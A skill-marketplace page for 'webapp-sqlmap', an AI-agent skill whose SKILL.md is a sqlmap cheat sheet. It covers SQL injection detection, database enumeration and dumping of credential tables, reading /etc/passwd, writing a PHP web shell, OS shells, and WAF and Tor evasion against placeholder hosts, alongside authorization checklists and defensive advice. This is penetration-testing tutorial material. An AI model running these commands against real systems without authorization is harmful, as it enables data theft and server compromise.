webapp-sqlmap

Automated SQL injection detection and exploitation tool for web application security testing. Use when: (1) Testing web applications for SQL injection vulnerabilities in authorized assessments, (2) Exploiting SQL injection flaws to demonstrate impact, (3) Extracting database information for security validation, (4) Bypassing authentication mechanisms through SQL injection, (5) Identifying vulnerable parameters in web requests, (6) Automating database enumeration and data extraction.

242 stars

byaiskillstore

View on GitHub Installation ↓

Best use case

webapp-sqlmap is best used when you need a repeatable AI agent workflow instead of a one-off prompt. It is especially useful for teams working in multi. Automated SQL injection detection and exploitation tool for web application security testing. Use when: (1) Testing web applications for SQL injection vulnerabilities in authorized assessments, (2) Exploiting SQL injection flaws to demonstrate impact, (3) Extracting database information for security validation, (4) Bypassing authentication mechanisms through SQL injection, (5) Identifying vulnerable parameters in web requests, (6) Automating database enumeration and data extraction.

Users should expect a more consistent workflow output, faster repeated execution, and less time spent rewriting prompts from scratch.

Practical example

Example input

Use the "webapp-sqlmap" skill to help with this workflow task. Context: Automated SQL injection detection and exploitation tool for web application security testing. Use when: (1) Testing web applications for SQL injection vulnerabilities in authorized assessments, (2) Exploiting SQL injection flaws to demonstrate impact, (3) Extracting database information for security validation, (4) Bypassing authentication mechanisms through SQL injection, (5) Identifying vulnerable parameters in web requests, (6) Automating database enumeration and data extraction.

Example output

A structured workflow result with clearer steps, more consistent formatting, and an output that is easier to reuse in the next run.

When to use this skill

Use this skill when you want a reusable workflow rather than writing the same prompt again and again.

When not to use this skill

Do not use this when you only need a one-off answer and do not need a reusable workflow.
Do not use it if you cannot install or maintain the related files, repository context, or supporting tools.

Installation

Claude Code / Cursor / Codex

$curl -o ~/.claude/skills/webapp-sqlmap/SKILL.md --create-dirs "https://raw.githubusercontent.com/aiskillstore/marketplace/main/skills/agentsecops/webapp-sqlmap/SKILL.md"

Manual Installation

Download SKILL.md from GitHub
Place it in .claude/skills/webapp-sqlmap/SKILL.md inside your project
Restart your AI agent — it will auto-discover the skill

How webapp-sqlmap Compares

Feature / Agent	webapp-sqlmap	Standard Approach
Platform Support	Not specified	Limited / Varies
Context Awareness	High	Baseline
Installation Complexity	Unknown	N/A

Frequently Asked Questions

What does this skill do?

Where can I find the source code?

You can find the source code on GitHub using the link provided at the top of the page.

SKILL.md Source

# SQLMap - Automated SQL Injection Tool

## Overview

SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities. This skill covers authorized security testing including vulnerability detection, database enumeration, data extraction, and authentication bypass.

**IMPORTANT**: SQL injection exploitation is invasive and can corrupt data. Only use SQLMap with proper written authorization on systems you own or have explicit permission to test.

## Quick Start

Basic SQL injection detection:

```bash
# Test single parameter
sqlmap -u "http://example.com/page?id=1"

# Test with POST data
sqlmap -u "http://example.com/login" --data="username=admin&password=test"

# Test from saved request file
sqlmap -r request.txt

# Detect and enumerate databases
sqlmap -u "http://example.com/page?id=1" --dbs
```

## Core Workflow

### SQL Injection Testing Workflow

Progress:
[ ] 1. Verify authorization for web application testing
[ ] 2. Identify potential injection points
[ ] 3. Detect SQL injection vulnerabilities
[ ] 4. Determine DBMS type and version
[ ] 5. Enumerate databases and tables
[ ] 6. Extract sensitive data (if authorized)
[ ] 7. Document findings with remediation guidance
[ ] 8. Clean up any test artifacts

Work through each step systematically. Check off completed items.

### 1. Authorization Verification

**CRITICAL**: Before any SQL injection testing:
- Confirm written authorization from application owner
- Verify scope includes web application security testing
- Understand data protection and handling requirements
- Document allowed testing windows
- Confirm backup and rollback procedures

### 2. Target Identification

Identify potential SQL injection points:

**GET Parameters**:
```bash
# Single URL with parameter
sqlmap -u "http://example.com/product?id=1"

# Multiple parameters
sqlmap -u "http://example.com/search?query=test&category=all&sort=name"

# Test all parameters
sqlmap -u "http://example.com/page?id=1&name=test" --level=5 --risk=3
```

**POST Requests**:
```bash
# POST data directly
sqlmap -u "http://example.com/login" --data="user=admin&pass=test"

# From Burp Suite request file
sqlmap -r login_request.txt

# With additional headers
sqlmap -u "http://example.com/api" --data='{"user":"admin"}' --headers="Content-Type: application/json"
```

**Cookies and Headers**:
```bash
# Test cookies
sqlmap -u "http://example.com/" --cookie="sessionid=abc123; role=user"

# Test custom headers
sqlmap -u "http://example.com/" --headers="X-Forwarded-For: 1.1.1.1\nUser-Agent: Test"

# Test specific injection point
sqlmap -u "http://example.com/" --cookie="sessionid=abc123*; role=user"
```

### 3. Detection and Fingerprinting

Detect SQL injection vulnerabilities:

```bash
# Basic detection
sqlmap -u "http://example.com/page?id=1"

# Aggressive testing (higher risk)
sqlmap -u "http://example.com/page?id=1" --level=5 --risk=3

# Specify technique
sqlmap -u "http://example.com/page?id=1" --technique=BEUSTQ

# Detect DBMS
sqlmap -u "http://example.com/page?id=1" --fingerprint

# Force specific DBMS
sqlmap -u "http://example.com/page?id=1" --dbms=mysql
```

**Injection Techniques**:
- **B**: Boolean-based blind
- **E**: Error-based
- **U**: UNION query-based
- **S**: Stacked queries
- **T**: Time-based blind
- **Q**: Inline queries

### 4. Database Enumeration

Enumerate database structure:

```bash
# List databases
sqlmap -u "http://example.com/page?id=1" --dbs

# Current database
sqlmap -u "http://example.com/page?id=1" --current-db

# List tables in database
sqlmap -u "http://example.com/page?id=1" -D database_name --tables

# List columns in table
sqlmap -u "http://example.com/page?id=1" -D database_name -T users --columns

# Database users
sqlmap -u "http://example.com/page?id=1" --users

# Database user privileges
sqlmap -u "http://example.com/page?id=1" --privileges
```

### 5. Data Extraction

Extract data from database (authorized only):

```bash
# Dump specific table
sqlmap -u "http://example.com/page?id=1" -D database_name -T users --dump

# Dump specific columns
sqlmap -u "http://example.com/page?id=1" -D database_name -T users -C username,password --dump

# Dump all databases (use with caution)
sqlmap -u "http://example.com/page?id=1" --dump-all

# Exclude system databases
sqlmap -u "http://example.com/page?id=1" --dump-all --exclude-sysdbs

# Search for specific data
sqlmap -u "http://example.com/page?id=1" -D database_name --search -C password
```

### 6. Advanced Exploitation

Advanced SQL injection techniques:

**File System Access**:
```bash
# Read file from server
sqlmap -u "http://example.com/page?id=1" --file-read="/etc/passwd"

# Write file to server (very invasive)
sqlmap -u "http://example.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"
```

**OS Command Execution** (requires stacked queries or out-of-band):
```bash
# Execute OS command
sqlmap -u "http://example.com/page?id=1" --os-cmd="whoami"

# Get OS shell
sqlmap -u "http://example.com/page?id=1" --os-shell

# Get SQL shell
sqlmap -u "http://example.com/page?id=1" --sql-shell
```

**Authentication Bypass**:
```bash
# Attempt to bypass login
sqlmap -u "http://example.com/login" --data="user=admin&pass=test" --auth-type=Basic

# Test with authentication
sqlmap -u "http://example.com/page?id=1" --auth-cred="admin:password"
```

### 7. WAF Bypass and Evasion

Evade web application firewalls:

```bash
# Use tamper scripts
sqlmap -u "http://example.com/page?id=1" --tamper=space2comment

# Multiple tamper scripts
sqlmap -u "http://example.com/page?id=1" --tamper=space2comment,between

# Random User-Agent
sqlmap -u "http://example.com/page?id=1" --random-agent

# Custom User-Agent
sqlmap -u "http://example.com/page?id=1" --user-agent="Mozilla/5.0..."

# Add delay between requests
sqlmap -u "http://example.com/page?id=1" --delay=2

# Use proxy
sqlmap -u "http://example.com/page?id=1" --proxy="http://127.0.0.1:8080"

# Use Tor
sqlmap -u "http://example.com/page?id=1" --tor --check-tor
```

**Common Tamper Scripts**:
- `space2comment`: Replace space with comments
- `between`: Replace equals with BETWEEN
- `charencode`: URL encode characters
- `randomcase`: Random case for keywords
- `apostrophemask`: Replace apostrophe with UTF-8
- `equaltolike`: Replace equals with LIKE

## Security Considerations

### Authorization & Legal Compliance

- **Written Permission**: Obtain explicit authorization for SQL injection testing
- **Data Protection**: Handle extracted data per engagement rules
- **Scope Boundaries**: Only test explicitly authorized applications
- **Backup Verification**: Ensure backups exist before invasive testing
- **Production Systems**: Extra caution on production databases

### Operational Security

- **Rate Limiting**: Use --delay to avoid overwhelming applications
- **Session Management**: Save and resume sessions with --flush-session
- **Logging**: All SQLMap activity is logged to ~/.sqlmap/output/
- **Data Sanitization**: Redact sensitive data from reports
- **False Positives**: Verify findings manually

### Audit Logging

Document all SQL injection testing:
- Target URLs and parameters tested
- Injection techniques successful
- Databases and tables accessed
- Data extracted (summary only, not full data)
- Commands executed
- Tamper scripts and evasion used

### Compliance

- **OWASP Top 10**: A03:2021 - Injection
- **CWE-89**: SQL Injection
- **MITRE ATT&CK**: T1190 (Exploit Public-Facing Application)
- **PCI-DSS**: 6.5.1 - Injection flaws
- **ISO 27001**: A.14.2 Security in development

## Common Patterns

### Pattern 1: Basic Vulnerability Assessment

```bash
# Detect vulnerability
sqlmap -u "http://example.com/page?id=1" --batch

# Enumerate databases
sqlmap -u "http://example.com/page?id=1" --dbs --batch

# Get current user and privileges
sqlmap -u "http://example.com/page?id=1" --current-user --current-db --is-dba --batch
```

### Pattern 2: Authentication Bypass Testing

```bash
# Test login form
sqlmap -u "http://example.com/login" \
  --data="username=admin&password=test" \
  --level=5 --risk=3 \
  --technique=BE \
  --batch

# Attempt to extract admin credentials
sqlmap -u "http://example.com/login" \
  --data="username=admin&password=test" \
  -D app_db -T users -C username,password --dump \
  --batch
```

### Pattern 3: API Testing

```bash
# JSON API endpoint
sqlmap -u "http://api.example.com/user/1" \
  --headers="Content-Type: application/json\nAuthorization: Bearer token123" \
  --level=3 \
  --batch

# REST API with POST
sqlmap -u "http://api.example.com/search" \
  --data='{"query":"test","limit":10}' \
  --headers="Content-Type: application/json" \
  --batch
```

### Pattern 4: Comprehensive Enumeration

```bash
# Full enumeration (use with extreme caution)
sqlmap -u "http://example.com/page?id=1" \
  --banner \
  --current-user \
  --current-db \
  --is-dba \
  --users \
  --passwords \
  --privileges \
  --dbs \
  --batch
```

## Integration Points

### Burp Suite Integration

```bash
# Save request from Burp Suite as request.txt
# Right-click request → "Copy to file"

# Test with SQLMap
sqlmap -r request.txt --batch

# Use Burp as proxy
sqlmap -u "http://example.com/page?id=1" --proxy="http://127.0.0.1:8080"
```

### Reporting and Output

```bash
# Save session for later
sqlmap -u "http://example.com/page?id=1" -s output.sqlite

# Resume session
sqlmap -u "http://example.com/page?id=1" --resume

# Custom output directory
sqlmap -u "http://example.com/page?id=1" --output-dir="/path/to/results"

# Verbose output
sqlmap -u "http://example.com/page?id=1" -v 3

# Traffic log
sqlmap -u "http://example.com/page?id=1" -t traffic.log
```

## Troubleshooting

### Issue: False Positives

**Solutions**:
```bash
# Increase detection accuracy
sqlmap -u "http://example.com/page?id=1" --string="Welcome" --not-string="Error"

# Use specific technique
sqlmap -u "http://example.com/page?id=1" --technique=U

# Manual verification
sqlmap -u "http://example.com/page?id=1" --sql-query="SELECT version()"
```

### Issue: WAF Blocking Requests

**Solutions**:
```bash
# Use tamper scripts
sqlmap -u "http://example.com/page?id=1" --tamper=space2comment,between --random-agent

# Add delays
sqlmap -u "http://example.com/page?id=1" --delay=3 --randomize

# Change HTTP method
sqlmap -u "http://example.com/page?id=1" --method=PUT
```

### Issue: Slow Performance

**Solutions**:
```bash
# Use threads (careful with application stability)
sqlmap -u "http://example.com/page?id=1" --threads=5

# Reduce testing scope
sqlmap -u "http://example.com/page?id=1" --level=1 --risk=1

# Test specific parameter only
sqlmap -u "http://example.com/page?id=1&name=test" -p id
```

## Defensive Considerations

Protect applications against SQL injection:

**Secure Coding Practices**:
- Use parameterized queries/prepared statements
- Employ ORM frameworks properly
- Validate and sanitize all user input
- Apply principle of least privilege to database accounts
- Disable error messages in production

**Web Application Firewall Rules**:
- Block common SQL injection patterns
- Implement rate limiting
- Monitor for suspicious query patterns
- Alert on multiple injection attempts

**Detection and Monitoring**:
- Log all database queries
- Monitor for unusual query patterns
- Alert on error-based injection attempts
- Detect time-based blind injection delays
- Monitor for UNION-based queries

## References

- [SQLMap Official Documentation](https://sqlmap.org/)
- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
- [CWE-89: SQL Injection](https://cwe.mitre.org/data/definitions/89.html)
- [SQLMap Tamper Scripts](https://github.com/sqlmapproject/sqlmap/tree/master/tamper)
- [PTES: Vulnerability Analysis](http://www.pentest-standard.org/index.php/Vulnerability_Analysis)

Related Skills

sqlmap-database-pentesting

242

from aiskillstore/marketplace

This skill should be used when the user asks to "automate SQL injection testing," "enumerate database structure," "extract database credentials using sqlmap," "dump tables and columns...

sqlmap-database-penetration-testing

242

from aiskillstore/marketplace

This skill should be used when the user asks to "automate SQL injection testing," "enumerate database structure," "extract database credentials using sqlmap," "dump tables and columns from a vulnerable database," or "perform automated database penetration testing." It provides comprehensive guidance for using SQLMap to detect and exploit SQL injection vulnerabilities.

webapp-nikto

242

from aiskillstore/marketplace

Web server vulnerability scanner for identifying security issues, misconfigurations, and outdated software versions. Use when: (1) Conducting authorized web server security assessments, (2) Identifying common web vulnerabilities and misconfigurations, (3) Detecting outdated server software and known vulnerabilities, (4) Performing compliance scans for web server hardening, (5) Enumerating web server information and enabled features, (6) Validating security controls and patch levels.

webapp-testing

240

from aiskillstore/marketplace

Toolkit for interacting with and testing local web applications using Playwright. Supports verifying frontend functionality, debugging UI behavior, capturing browser screenshots, and viewing browser logs.

azure-quotas

242

from aiskillstore/marketplace

Check/manage Azure quotas and usage across providers. For deployment planning, capacity validation, region selection. WHEN: "check quotas", "service limits", "current usage", "request quota increase", "quota exceeded", "validate capacity", "regional availability", "provisioning limits", "vCPU limit", "how many vCPUs available in my subscription".

DevOps & Infrastructure

raindrop-io

242

from aiskillstore/marketplace

Manage Raindrop.io bookmarks with AI assistance. Save and organize bookmarks, search your collection, manage reading lists, and organize research materials. Use when working with bookmarks, web research, reading lists, or when user mentions Raindrop.io.

Data & Research

zlibrary-to-notebooklm

242

from aiskillstore/marketplace

自动从 Z-Library 下载书籍并上传到 Google NotebookLM。支持 PDF/EPUB 格式，自动转换，一键创建知识库。

discover-skills

242

from aiskillstore/marketplace

当你发现当前可用的技能都不够合适（或用户明确要求你寻找技能）时使用。本技能会基于任务目标和约束，给出一份精简的候选技能清单，帮助你选出最适配当前任务的技能。

web-performance-seo

242

from aiskillstore/marketplace

Fix PageSpeed Insights/Lighthouse accessibility "!" errors caused by contrast audit failures (CSS filters, OKLCH/OKLAB, low opacity, gradient text, image backgrounds). Use for accessibility-driven SEO/performance debugging and remediation.

project-to-obsidian

242

from aiskillstore/marketplace

将代码项目转换为 Obsidian 知识库。当用户提到 obsidian、项目文档、知识库、分析项目、转换项目时激活。【激活后必须执行】： 1. 先完整阅读本 SKILL.md 文件 2. 理解 AI 写入规则（默认到 00_Inbox/AI/、追加式、统一 Schema） 3. 执行 STEP 0: 使用 AskUserQuestion 询问用户确认 4. 用户确认后才开始 STEP 1 项目扫描 5. 严格按 STEP 0 → 1 → 2 → 3 → 4 顺序执行【禁止行为】： - 禁止不读 SKILL.md 就开始分析项目 - 禁止跳过 STEP 0 用户确认 - 禁止直接在 30_Resources 创建（先到 00_Inbox/AI/） - 禁止自作主张决定输出位置

obsidian-helper

242

from aiskillstore/marketplace

Obsidian 智能笔记助手。当用户提到 obsidian、日记、笔记、知识库、capture、review 时激活。【激活后必须执行】： 1. 先完整阅读本 SKILL.md 文件 2. 理解 AI 写入三条硬规矩（00_Inbox/AI/、追加式、白名单字段） 3. 按 STEP 0 → STEP 1 → ... 顺序执行 4. 不要跳过任何步骤，不要自作主张【禁止行为】： - 禁止不读 SKILL.md 就开始工作 - 禁止跳过用户确认步骤 - 禁止在非 00_Inbox/AI/ 位置创建新笔记（除非用户明确指定）

internationalizing-websites

242

from aiskillstore/marketplace

Adds multi-language support to Next.js websites with proper SEO configuration including hreflang tags, localized sitemaps, and language-specific content. Use when adding new languages, setting up i18n, optimizing for international SEO, or when user mentions localization, translation, multi-language, or specific languages like Japanese, Korean, Chinese.